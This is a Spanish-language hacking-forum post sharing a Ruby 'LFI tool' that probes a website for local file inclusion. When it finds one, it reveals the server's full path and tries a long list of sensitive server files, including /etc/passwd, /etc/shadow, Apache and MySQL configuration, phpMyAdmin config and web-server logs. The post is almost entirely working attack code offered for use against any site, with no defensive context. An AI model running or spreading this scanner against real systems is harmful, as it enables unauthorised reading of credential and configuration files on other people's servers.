[Ruby] LFI T00l

Iniciado por BigBear, Julio 03, 2011, 09:32:22 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Julio 03, 2011, 09:32:22 PM Ultima modificación: Julio 31, 2014, 10:17:44 PM por Expermicid
Un scanner de LFI

Código: ruby

#!usr/bin/ruby
#LFI tool (C) Doddy Hackman 2010 
#contact me : doddy-hackman.blogspot.com

require 'net/http'


def uso
  print "\n[+] lfi.rb <site>\n"
end

def toma(host,path)
  http = Net::HTTP.new(host,80)
  return http.get(path).body
end

def fuzz(web) 
files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']
 files.each do |file|
begin
 url = URI.parse(web)
 code = toma(url.host,url.path+"?"+url.query+file)
 if not code=~/No such file or directory in/
   print "[Link] : "+web+file+"\n"
 end
 end
end
end


def scan(web)
  print "\n[+] Testing the vulnerability LFI...\n\n"
  begin
  url = URI.parse(web)
  code = toma(url.host,url.path+"?"+url.query+"'")
  if code=~/No such file or directory in/
   saca = code.split("No such file or directory in <b>")
   saca = saca[1].split("<\/b> on line")
   print "[+] LFI Detected\n\n"
   print "[Full Path Discloure]: "+saca[0]+"\n"
   print "\n\n[+] Fuzzing Files\n\n"
   fuzz(web)
   print "\n[+] Finish\n"
  copyright()
  else
    print "[-] Not Vulnerable to LFI\n\n"
end
end
end

def head() 
  print "\n\n -- == LFI tOOL == --\n\n"
end

def copyright() 
   print "\n\n\n(C) Doddy Hackman 2010\n\n"
   exit(1)
 end
 
head()
if !ARGV[0] 
  uso()
else 
  scan(ARGV[0])  
end
copyright()
Imprimir
Ir Arriba Páginas1
Acciones del Usuario